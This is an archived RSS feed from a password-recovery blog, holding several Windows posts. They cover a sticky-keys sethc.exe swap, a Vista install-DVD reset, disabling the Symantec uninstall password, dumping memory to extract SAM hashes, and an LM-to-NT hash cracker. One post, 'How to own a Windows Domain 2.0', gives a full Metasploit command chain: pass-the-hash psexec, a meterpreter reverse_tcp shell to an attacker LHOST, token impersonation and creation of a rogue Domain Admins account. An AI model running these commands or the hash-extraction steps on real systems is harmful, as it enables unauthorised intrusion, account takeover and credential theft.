<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>What&#039;s My Pass? &#187; Administrator</title>
	<atom:link href="http://www.whatsmypass.com/tag/administrator/feed" rel="self" type="application/rss+xml" />
	<link>http://www.whatsmypass.com</link>
	<description>Password Recovery for Windows, Mac, Linux, browsers, email, instant messengers, BIOS</description>
	<lastBuildDate>Tue, 24 Jan 2012 16:08:10 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Change your password with sticky keys</title>
		<link>http://www.whatsmypass.com/change-your-password-with-sticky-keys</link>
		<comments>http://www.whatsmypass.com/change-your-password-with-sticky-keys#comments</comments>
		<pubDate>Wed, 18 Aug 2010 22:56:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[Internet Explorer Passwords]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[operating system]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[Windows PE]]></category>
		<category><![CDATA[Windows Vista]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1007</guid>
		<description><![CDATA[Forgot the administrator password? There are many ways to access a Windows installation if you forgot the administrator password. Today I’ll show you another procedure to reset the Windows password by replacing the Sticky Keys application. This program allows you to use the function keys SHIFT, CTRL, ALT, or the Windows key by typing one [...]]]></description>
			<content:encoded><![CDATA[<p>Forgot the administrator password? There are many ways to access a Windows installation if you forgot the administrator password. Today I’ll show you another procedure to reset the Windows password by replacing the Sticky Keys application. This program allows you to use the function keys SHIFT, CTRL, ALT, or the Windows key by typing one key after the other instead of pressing them simultaneously with the second key. The main advantage of this password reset method is that you don’t need third-party software; another plus is that it is easy to carry out because no Registry hack is required, as when you offline enable the built-in administrator.</p>
<p>Please note that resetting the password from an account other than  the corresponding user account always means that the user loses the  credentials stored in the Windows  Vault, stored  Internet Explorer passwords, and files that you encrypted with the  Encrypting File System (EFS). Of course, if you have a backup of these  credentials, you can restore them; likewise, if you have exported the  private EFS key, you can import it again after you have reset the  password.</p>
<p>Like with all other solutions that allow you to reset the Windows  password without having an account on the corresponding computer, you  have to boot from a second operating system and access the Windows  installation while it is offline.</p>
<p>You can do this with a bootable  Windows PE USB stick or by using Windows RE. You can start Windows  RE by booting the Windows Vista or Windows 7 setup DVD and then  selecting “Repair” instead of “Install Windows.”</p>
<p> By the way, you can’t use the Windows XP boot CD for this purpose  because its Recovery Console will ask for a password for the offline  installation. However, you can use a Vista or Windows 7 DVD to reset a  forgotten Windows administrator password on Windows XP.</p>
<p>This works because Windows RE, which is based on Vista or Windows 7,  will let you launch a command prompt with access to an offline  installation without requiring a password.<br />
<span id="more-1007"></span></p>
<h2>To reset a forgotten administrator password, follow these steps:</h2>
<ol>
<li>Boot from Windows PE or Windows RE and access the command prompt.</li>
<li>Find the drive letter of the partition where Windows is installed.  In Vista and Windows XP, it is usually C:, in Windows 7, it is D: in  most cases because the first partition contains Startup Repair. To find  the drive letter, type C: (or D:, respectively) and search for the  Windows folder. Note that Windows PE (RE) usually resides on X:.</li>
<li>Type the following command (replace “c:” with the correct drive  letter if Windows is not located on C:):<br />
<strong>copy c:\windows\system32\sethc.exe c:\<br />
</strong>This creates a copy of sethc.exe to restore later.</li>
<li>Type this command to replace sethc.exe with cmd.exe:<br />
<strong>copy /y c:\windows\system32\cmd.exe  c:\windows\system32\sethc.exe</strong></li>
<li>Reboot your computer and start the Windows installation where you  forgot the administrator password.</li>
<li>After you see the logon screen, press the SHIFT key five times.</li>
<li>You should see a command prompt where you can enter the following  command to reset the Windows password (see screenshot above):<br />
<strong>net user <em>you_user_name new_password<br />
</em></strong>If you don’t know your user name, just type <strong>net  user </strong>to list the available user names.</li>
<li>You can now log on with the new password.</li>
</ol>
<p>I recommend that you replace sethc.exe with the copy you stored in  the root folder of your system drive in step 3. For this, you have to  boot up again with Windows PE or RE because you can’t replace system  files while the Windows installation is online.</p>
<p>Via: <a href="http://4sysops.com/archives/forgot-the-administrator-password-the-sticky-keys-trick/">4sysops.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/change-your-password-with-sticky-keys/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>How to own a Windows Domain 2.0</title>
		<link>http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0</link>
		<comments>http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0#comments</comments>
		<pubDate>Sat, 20 Feb 2010 16:42:22 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[Domain Admins]]></category>
		<category><![CDATA[domain server]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[net]]></category>
		<category><![CDATA[Windows Server]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0</guid>
		<description><![CDATA[Back in October we showed you a video on how to own a Windows domain by passing the hash from the local admin account to the domain server to add a new domain admin account. This newer version makes the task much easier using Backtrack4 and metasploit. The commands used in the video: mount /dev/sda1 [...]]]></description>
			<content:encoded><![CDATA[<p>Back in October we showed you a <a href="http://www.whatsmypass.com/how-to-own-a-windows-domain">video</a> on how to own a Windows domain by passing the hash from the local admin account to the domain server to add a new domain admin account. This newer version makes the task much easier using Backtrack4 and metasploit.<br />
<center><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></center><br />
<span id="more-861"></span><br />
<code><br />
The commands used in the video:</p>
<p>mount /dev/sda1 /mnt/sda1<br />
cd /mnt/sda1/WINDOWS/system32/config<br />
samdump2 system SAM<br />
msfconsole<br />
use windows/smb/psexec<br />
exploit -p windows/meterpreter/reverse_tcp -o LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123...:5654... -j<br />
sessions -i 1<br />
use incognito<br />
list_tokens -u<br />
impersonate_token mydomain\\domainadmin<br />
execute -f cmd.exe -i -t<br />
net user hack MPass5678 /add /domain<br />
net group "Domain Admins" hack /add /domain<br />
PWNED <img src='http://www.whatsmypass.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
</code><br />
Lessons learned :<br />
1. never reuse admin passwords, even if they are technically unbreakable<br />
2. everything is a lot easier with the right tools.</p>
<p>Attack is compatible with WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Dumping Physical Memory to extract SAM Hashes</title>
		<link>http://www.whatsmypass.com/dumping-physical-memory-to-extract-sam-hashes</link>
		<comments>http://www.whatsmypass.com/dumping-physical-memory-to-extract-sam-hashes#comments</comments>
		<pubDate>Sat, 21 Mar 2009 21:48:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Password Info]]></category>
		<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[dump]]></category>
		<category><![CDATA[free software]]></category>
		<category><![CDATA[hash]]></category>
		<category><![CDATA[Manitoba]]></category>
		<category><![CDATA[memory]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[operating systems]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[python interpreter]]></category>
		<category><![CDATA[sam]]></category>
		<category><![CDATA[Windows 2000]]></category>
		<category><![CDATA[Windows 2003 Server]]></category>
		<category><![CDATA[Windows 2008]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=507</guid>
		<description><![CDATA[Tools Needed : MDD pyCrypto Volatility 1.3 Beta Volatility Plugin from Moyix ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server. After downloading MDD from the [...]]]></description>
			<content:encoded><![CDATA[<p class="excerpt">Tools Needed : MDD pyCrypto Volatility 1.3 Beta Volatility Plugin from Moyix ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server. After downloading MDD from the Mantech site you need to run <span id="more-507"></span></p>
<p>Tools Needed :</p>
<p><a href="http://www.mantech.com/msma/MDD.asp">MDD</a></p>
<p><a href="http://www.voidspace.org.uk/downloads/pycrypto-2.0.1.win32-py2.6.exe">pyCrypto</a></p>
<p><a href="https://www.volatilesystems.com/volatility/1.3/Volatility-1.3_Beta.zip">Volatility 1.3 Beta</a></p>
<p><a href="http://kurtz.cs.wesleyan.edu/%7Ebdolangavitt/memory/volreg-0.2.zip">Volatility Plugin from Moyix</a></p>
<p>ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.</p>
<p>After downloading MDD from the Mantech site you need to run the program at the command line.</p>
<p>MDD Command Line Usage:</p>
<p><span style="font-style: italic;">mdd -o OUTPUTFILENAME</span></p>
<p>Step by Step Example :</p>
<p>First of all, run MDD to dump the memory of the machine. The output file , would be an image of the physical memory, and MDD is often used to only dump the memory.</p>
<p><span style="font-style: italic;">C:\Documents and Settings\Administrator\Desktop\MDD&gt;mdd_1.3.exe -o dump.dd</span></p>
<p><span style="font-style: italic;">-&gt; mdd</span></p>
<p><span style="font-style: italic;">-&gt; ManTech Physical Memory Dump Utility</span></p>
<p><span style="font-style: italic;">Copyright (C) 2008 ManTech Security &amp; Mission Assurance</span></p>
<p><span style="font-style: italic;">-&gt; This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w’</span></p>
<p><span style="font-style: italic;">This is free software, and you are welcome to redistribute it</span></p>
<p><span style="font-style: italic;">under certain conditions; use option `-c’ for details.</span></p>
<p><span style="font-style: italic;">-&gt; Dumping 511.48 MB of physical memory to file ‘dump.dd’.</span></p>
<p><span style="font-style: italic;">130938 map operations succeeded (1.00)</span></p>
<p><span style="font-style: italic;">0 map operations failed</span></p>
<p><span style="font-style: italic;">took 32 seconds to write</span></p>
<p><span style="font-style: italic;">MD5 is: 78924418adaf67d22a6687dcc6ff4e23</span></p>
<p><span style="font-style: italic;">C:\Documents and Settings\Administrator\Desktop\MDD&gt;</span></p>
<p>Next, we will need to analyze the “memory image” &#8211; dump.dd .</p>
<p>For this, we will be using Using Volatility (1.3_Beta), Volatility Plugin from Moyix, and a Windows Hash/Password Finder (SamInside) to identify the passwords.</p>
<p>1. First of all, most of these scripts are written in python, and as such, you would need to download and install a python interpreter (Active Python ).</p>
<p>2. Download Volatility (1.3_Beta) , extract it to a folder.</p>
<p>3. Download Volatility Plugin from Moyix, extract it, and copy its content into the Volatility folder, overwriting your existing forensics, memory_objects, and memory_plugins folders.</p>
<p>4. Download pyCrypto and install it.</p>
<p>5. Copy the dump.dd file (output file of MDD) into the Volatility folder.</p>
<p>6. Run hivescan from volatility to get the hive offsets. Execute the following:</p>
<p><span style="font-style: italic;">C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta&gt; python volatility hivescan -f dump.dd</span></p>
<p><span style="font-style: italic;">Offset (hex)</span></p>
<p><span style="font-style: italic;">45147992 0×2b0e758</span></p>
<p><span style="font-style: italic;">45393752 0×2b4a758</span></p>
<p><span style="font-style: italic;">49832984 0×2f86418</span></p>
<p><span style="font-style: italic;">56797016 0×362a758</span></p>
<p><span style="font-style: italic;">58091352 0×3766758</span></p>
<p><span style="font-style: italic;">64191328 0×3d37b60</span></p>
<p><span style="font-style: italic;">145440776 0×8ab4008</span></p>
<p><span style="font-style: italic;">146819936 0×8c04b60</span></p>
<p><span style="font-style: italic;">147082080 0×8c44b60</span></p>
<p><span style="font-style: italic;">197245792 0xbc1bb60</span></p>
<p><span style="font-style: italic;">215368912 0xcd644d0</span></p>
<p><span style="font-style: italic;">228964464 0xda5b870</span></p>
<p><span style="font-style: italic;">244838408 0xe97f008</span></p>
<p><span style="font-style: italic;">271077384 0×10285008</span></p>
<p><span style="font-style: italic;">271171592 0×1029c008</span></p>
<p><span style="font-style: italic;">361696096 0×158f0b60</span></p>
<p><span style="font-style: italic;">373147760 0×163dc870</span></p>
<p><span style="font-style: italic;">401433808 0×17ed64d0</span></p>
<p><span style="font-style: italic;">425734152 0×19603008</span></p>
<p><span style="font-style: italic;">435642376 0×19f76008</span></p>
<p><span style="font-style: italic;">452021088 0×1af14b60</span></p>
<p><span style="font-style: italic;">489651040 0×1d2f7b60</span></p>
<p><span style="font-style: italic;">506391392 0×1e2eeb60</span></p>
<p><span style="font-style: italic;">509397104 0×1e5cc870</span></p>
<p><span style="font-style: italic;">526976208 0×1f6904d0</span></p>
<p><span style="font-style: italic;">C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta&gt;</span></p>
<p>7. Next, Run hivelist from volatility with the first hivescan offset, from previous output. Execute the following:</p>
<p><span style="font-style: italic;">C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta&gt;python volatility hivelist -f dump.dd -o 0×2b0e758</span></p>
<p><span style="font-style: italic;">Address Name</span></p>
<p><span style="font-style: italic;">0xe1cda008 \Documents and Settings\Administrator\Local Settings\Application Da</span></p>
<p><span style="font-style: italic;">ta\Microsoft\Windows\UsrClass.dat</span></p>
<p><span style="font-style: italic;">0xe1cc4008 \Documents and Settings\Administrator\NTUSER.DAT</span></p>
<p><span style="font-style: italic;">0xe1afeb60 \Documents and Settings\LocalService\Local Settings\Application Dat</span></p>
<p><span style="font-style: italic;">a\Microsoft\Windows\UsrClass.dat</span></p>
<p><span style="font-style: italic;">0xe1b4c008 \Documents and Settings\LocalService\NTUSER.DAT</span></p>
<p><span style="font-style: italic;">0xe1b13870 \Documents and Settings\NetworkService\Local Settings\Application D</span></p>
<p><span style="font-style: italic;">ata\Microsoft\Windows\UsrClass.dat</span></p>
<p><span style="font-style: italic;">0xe1b004d0 \Documents and Settings\NetworkService\NTUSER.DAT</span></p>
<p><span style="font-style: italic;">0xe1609b60 \WINDOWS\system32\config\software</span></p>
<p><span style="font-style: italic;">0xe160bb60 \WINDOWS\system32\config\default</span></p>
<p><span style="font-style: italic;">0xe1741b60 \WINDOWS\system32\config\SAM</span></p>
<p><span style="font-style: italic;">0xe1607008 \WINDOWS\system32\config\SECURITY</span></p>
<p><span style="font-style: italic;">0xe142e418 [no name]</span></p>
<p><span style="font-style: italic;">0xe1036758 \WINDOWS\system32\config\system</span></p>
<p><span style="font-style: italic;">0xe1022758 [no name]</span></p>
<p><span style="font-style: italic;">C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta&gt;</span></p>
<p>8. Now that we have the address locations, Pay attention to SAM &amp; SYSTEM addresses. Find Password Hash using this command : python volatility hashdump -f dump.dd -y System Hive Offset -s SAM Hive Offset.</p>
<p><span style="font-style: italic;">python volatility hashdump -f dump.dd -y 0xe1036758 -s 0xe1741b60</span></p>
<p>Extracted SAM :</p>
<p><span style="font-style: italic;">Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span></p>
<p><span style="font-style: italic;">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span></p>
<p><span style="font-style: italic;">HelpAssistant:1000:e342f6782d705142f81cce8f13488846:5cc6a7ed5dce2e04e648b8b6c14c9eed:::</span></p>
<p><span style="font-style: italic;">SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:00fb5891d8488d816968e68a09a868b8:::</span></p>
<p><span style="font-style: italic;">john:1003:972d6bbe1f00e65eaad3b435b51404ee:69bf94898385467264708f3cc51cf0a4:::</span></p>
<p>Now you can just open this as a pwdump file in SamInside and crack it !</p>
<p>Source: <a href="http://www.akati.com/warlock/?p=61">Warlock</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/dumping-physical-memory-to-extract-sam-hashes/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Change Vista Password From Install DVD</title>
		<link>http://www.whatsmypass.com/change-vista-password-from-install-dvd</link>
		<comments>http://www.whatsmypass.com/change-vista-password-from-install-dvd#comments</comments>
		<pubDate>Sat, 14 Feb 2009 21:51:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Password Info]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[forgotten Vista  Administrator]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[setup media]]></category>
		<category><![CDATA[vista]]></category>
		<category><![CDATA[vista dvd]]></category>
		<category><![CDATA[vista hack]]></category>
		<category><![CDATA[Windows Vista]]></category>
		<category><![CDATA[Windows Vista  Administrator]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=469</guid>
		<description><![CDATA[Please take note that this handy tip is intended to recover/regain a forgotten Vista Administrator password. It is not intended to illegally hacking into a Vista system that&#8217;s not owning by users who refer this guide!! It is also intended to inform Vista users about the method by which anyone can access their private accounts [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://3.bp.blogspot.com/_tqdukxIfRPQ/SY29rWTas0I/AAAAAAAABR8/3918DZi4_Ss/s400/Hack-Windows-Vista-in-Reduced-Functionality-Mode-2.png" alt="" /><br />
<span style="color: #000000;"><span>Please take note that this handy tip is intended to recover/regain a forgotten Vista <span style="color: #000000; font-size: 12px; font-weight: 400; font-style: normal; font-family: Arial,Helvetica,sans-serif; text-decoration: underline;">Administrator password</span>. It is not intended to illegally hacking into a Vista system that&#8217;s not owning by users who refer this guide!!</span></span> <span style="color: #000000;">It is also intended to inform Vista users about the method by which anyone can access their private accounts by cracking passwords&#8230;.Thus anyone can hack into administrator account and bypass guest user restrictions&#8230;.</span> <span style="color: #000000;">Lets start&#8230;</span> <strong style="color: #000000;"><span>Steps to hack <span style="color: #000000; font-size: 12px; font-style: normal; font-family: Arial,Helvetica,sans-serif; text-decoration: underline;">Windows Vista</span> Administrator account password:</span></strong><span id="more-469"></span></p>
<p><span>1. Reboot the <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> and boot up with <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> installation DVD.</span> <span style="color: #000000;"><span>Crack <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> logon account password in minute with the <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> installation DVD. Click on the Repair Your Computer </span></span><span style="color: #000000;"><span> <span style="color: #000000; font-size: 12px; font-weight: 400; font-style: normal; font-family: Arial,Helvetica,sans-serif; text-decoration: underline;">option</span>, bring up Command Prompt to open Local Users and Groups management in MMC.</span></span></p>
<p><span>2. While the <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> installation interface pops up, click the Repair You Computer link at the bottom-left corner.</span></p>
<p><span class="fullpost" style="color: #000000;"><span>3. Next, the System Recovery Options dialog box appears. There are few options that related to repairing <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span>, looks like Recovery Console in Windows XP:</span></span></p>
<p><span class="fullpost" style="color: #000000;"><strong>Startup Repair options</strong><span> is used to automatically fix problems that are preventing <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> from starting.</span></span></p>
<p><span class="fullpost" style="color: #000000;"><strong>System Restore</strong><span> to restore <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> setting to an earlier point in time.</span></span></p>
<p><span class="fullpost" style="color: #000000;"><strong>Windows Complete PC Restore</strong><span> to restore <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> from a full system backup.</span></span></p>
<p><span class="fullpost" style="color: #000000;"><strong><span><span style="color: #000000; font-size: 12px; font-style: normal; font-family: Arial,Helvetica,sans-serif; text-decoration: underline;">Windows Memory Diagnostic</span> Tool</span></strong> could be the first Microsoft memory tester toolkit that bundled with Windows setup media.</span></p>
<p><span class="fullpost" style="color: #000000;"><span>Command Prompt is the target <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />option</span> of this Vista hacking guide. Click on this <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />option</span> now.</span></span></p>
<p><span class="fullpost" style="color: #000000;"><span>4. In the <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span><span> Command Prompt, type mmc.exe and press ENTER key to bring up the <span style="color: #000000; font-size: 12px; font-weight: 400; font-style: normal; font-family: Arial,Helvetica,sans-serif; text-decoration: underline;">Microsoft Management Console</span>.</span></span></span></p>
<p><span class="fullpost" style="color: #000000;"><span>5. Click on the File menu, select Add / Remove Snap-in <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />option</span>, locate and select the Local Users and Groups on the left panel, and click Add button to add it to the right panel.</span></span></p>
<p><span class="fullpost" style="color: #000000;">6. Now, the Choose Target Machine dialog box pop up. Keep the default setting by clicking the Finish button – that means using the Local Users and Groups snap-in to manage this local computer, and not another computer in network.</span></p>
<p><span class="fullpost" style="color: #000000;">7. Click OK button and return to MMC windows. Under the Root Console in left panel, double-click Local Users and Group that was added earlier. Click on User folder, locate and right-click the target Vista logon account that found in the right panel.</span></p>
<p><span class="fullpost" style="color: #000000;">Select the Set Password from the right-click menu to set a new password / reset old password.</span></p>
<p>Src: <a href="http://techol.blogspot.com/2009/02/hack-windows-vista-administrator.html">Techol</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/change-vista-password-from-install-dvd/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Password to Uninstall Symantec Antivirus Client</title>
		<link>http://www.whatsmypass.com/password-to-uninstall-symantec-antivirus-client</link>
		<comments>http://www.whatsmypass.com/password-to-uninstall-symantec-antivirus-client#comments</comments>
		<pubDate>Wed, 12 Nov 2008 21:18:03 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Password Info]]></category>
		<category><![CDATA[Wireless]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[INTEL;]]></category>
		<category><![CDATA[Norton]]></category>
		<category><![CDATA[pain]]></category>
		<category><![CDATA[Symantec;]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=393</guid>
		<description><![CDATA[We all know Norton can&#8217;t protect you , but also Norton is sometimes a pain in the ass to uninstall , sometimes it has files you cant remove etc. But even before you get to that point you&#8217;re prompted for an uninstall passowrd? wtf? sometimes you were the person who installed it sometimes you&#8217;re not [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;">We all know Norton can&#8217;t protect you , but also Norton is sometimes a pain in the ass to uninstall , sometimes it has files you cant remove etc. But even before you get to that point you&#8217;re prompted for an uninstall passowrd? wtf? sometimes you were the person who installed it sometimes you&#8217;re not either  way you don&#8217;t know the password. Here&#8217;s a simple way to bypass that problem.</p>
<p style="text-align: left;">The default password that should work for most of the Symantec uninstallation is “symantec“. Duh.</p>
<p style="text-align: left;">If the default password doesn&#8217;t work do this:<br />
1) Go to Start -&gt; Run and type regedit</p>
<p style="text-align: left;">2) Navigate to: </p>
<pre style="text-align: left;">HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\LANDesk\VirusProtect6\CurrentVersion\Administrator Only\Security\</pre>
<p style="text-align: left;"> </p>
<p style="text-align: left;">3) Double click on the value name “UseVPUninstallPassword” and change the value from 1 to 0</p>
<p style="text-align: left;">4) Close the registry and retry the uninstall.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/password-to-uninstall-symantec-antivirus-client/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>lm2ntcrack : NT Hash cracker from LM Password</title>
		<link>http://www.whatsmypass.com/lm2ntcrack-nt-hash-cracker-from-lm-password</link>
		<comments>http://www.whatsmypass.com/lm2ntcrack-nt-hash-cracker-from-lm-password#comments</comments>
		<pubDate>Mon, 20 Oct 2008 04:11:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Password Info]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[NT Hash cracker]]></category>
		<category><![CDATA[Password Cracker]]></category>
		<category><![CDATA[Perl]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=356</guid>
		<description><![CDATA[lm2ntcrack provides a simple way to crack instantly Microsoft Windows NT Hash (MD4) when the LM Password is known. lm2ntcrack is Free and Open Source software. This software is entirely written in Perl, so its easily ported and installed. Pen-testers often encounter a problem during Windows penetration testing and password assessment. Dumping Windows passwords hashes, [...]]]></description>
			<content:encoded><![CDATA[<p>lm2ntcrack provides a simple way to crack instantly Microsoft Windows NT Hash (MD4) when the LM Password is known. lm2ntcrack is Free and Open Source software.<br />
This software is entirely written in Perl, so its easily ported and installed.<br />
<span id="more-356"></span><br />
Pen-testers often encounter a problem during Windows penetration testing and password assessment.<br />
Dumping Windows passwords hashes, permits to crack many LM passwords but cracked password cannot be used as is (uppercase version of the Windows password).<br />
On the other hand, password cracking on NT hash is long and after few days it cracks only some password.</p>
<p>So you&#8217;ve got the LM password but it is only in UpperCase because LM Hashes are not case sensitive. So, these passwords cannot be reuse in this form.</p>
<p>Example : Password cracker output for &#8220;Administrator&#8221; account</p>
<p>    * LM password is ADMINISTRAT0R.<br />
    * NT password is ?????????????.</p>
<p>I&#8217;m not so lucky because the case-sensitive password isn&#8217;t &#8220;administrat0r&#8221; or &#8220;Administrat0r&#8221;. So I cannot use this to connect on the audited Windows system.</p>
<p>This password contains 13 characters but launching my password cracker on the NT hash is a waste of time and there is a poor chance of success.</p>
<p>Note :</p>
<p>    * Password length : 13 characters.<br />
    * Details : 1 number + 12 case-sensitives letters.<br />
    * Possibilities : 2^12 = 4096 choices. (Cannot test them all manually)</p>
<p>In this example, lm2ntcrack will generate the 4096 possibilities for the password ADMINISTRAT0R and, for each one, the associated NT MD4 hash. Then, search for matching with the dumped hash.</p>
<p>Execution time : < 2 seconds to crack more than 1200 NT Hashes<br />
To read more about this and download the script visit <a href="http://www.xmcopartners.com/lm2ntcrack/index.html">http://www.xmcopartners.com/lm2ntcrack/index.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/lm2ntcrack-nt-hash-cracker-from-lm-password/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Change MSSQL2005 Password from Command Prompt</title>
		<link>http://www.whatsmypass.com/change-mssql2005-password-from-command-prompt</link>
		<comments>http://www.whatsmypass.com/change-mssql2005-password-from-command-prompt#comments</comments>
		<pubDate>Fri, 17 Oct 2008 18:53:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Password Info]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[Command Prompt SA]]></category>
		<category><![CDATA[L]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[MSSQL SA]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=327</guid>
		<description><![CDATA[SA is the administrative login for the MSSQL. To Change the MSSQL SA password please use following steps: Step 1. Go to the command prompt of the server ( Start &#62;&#62; Run &#62;&#62; Cmd ) and type in command osql –L This command will list all the MSSQL servers near you. Step 2. Copy full [...]]]></description>
